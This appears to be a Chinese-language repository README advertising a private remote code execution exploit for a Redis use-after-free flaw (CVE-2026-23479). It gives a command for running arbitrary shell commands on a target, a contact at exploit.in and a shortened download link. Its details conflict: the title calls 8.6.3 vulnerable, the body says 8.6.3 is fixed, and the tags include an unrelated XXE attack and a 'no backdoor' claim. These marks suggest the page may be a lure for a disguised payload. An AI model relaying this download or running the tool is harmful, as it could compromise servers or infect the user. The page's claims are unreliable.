jenniferreire26/CVE-2026-23479

# redis-server 从 7.2.0 到 8.6.3 版本，远程代码执行漏洞 (CVE-2026-23479) ## 概述 已确认存在一个高危漏洞，编号为 CVE-2026-23479，归类于 CWE-416 (CVSS 8.8)。Redis 是一种基于内存的数据结构存储系统。在 7.2.0 到 8.6.3 版本的 redis-server 中，当重新执行被阻塞的命令时，解除阻塞的客户端流程未能正确处理 `processCommandAndResetClient` 返回的错误。 ## 详细信息 - **CVE ID**: [CVE-2026-23479](https://nvd.nist.gov/vuln/detail/CVE-2026-23479) - **发现时间**: 2026-05-05 - **发布时间**: 2026-05-05 - **影响**: 机密性、完整性、可用性 - **漏洞利用可用性**: 未公开，仅限私下使用。 ## 漏洞描述 Redis 是一种基于内存的数据结构存储系统。在 7.2.0 到 8.6.3 版本的 redis-server 中，当重新执行被阻塞的命令时，解除阻塞的客户端流程未能正确处理 `processCommandAndResetClient` 返回的错误。如果在此流程中有被阻塞的客户端被驱逐，经过认证的攻击者可以触发释放后使用漏洞，这可能导致远程代码执行。此问题已在 8.6.3 版本中修复。 ## 受影响版本 **Redis Redis:** - 8.6.3 之前版本 ## 运行 运行此漏洞利用程序需要 Python 3.9。 执行： ``` python exploit.py -h 10.10.10.10 -c 'uname -a' ``` ## 联系方式 如有疑问，请联系 **security@exploit.in** ## 漏洞利用： ### [在此下载](https://tinyurl.com/29ndcrn8)

标签：Python, Redis, XXE攻击, 安全漏洞, 搜索引擎查询, 无后门, 编程工具, 远程代码执行, 逆向工具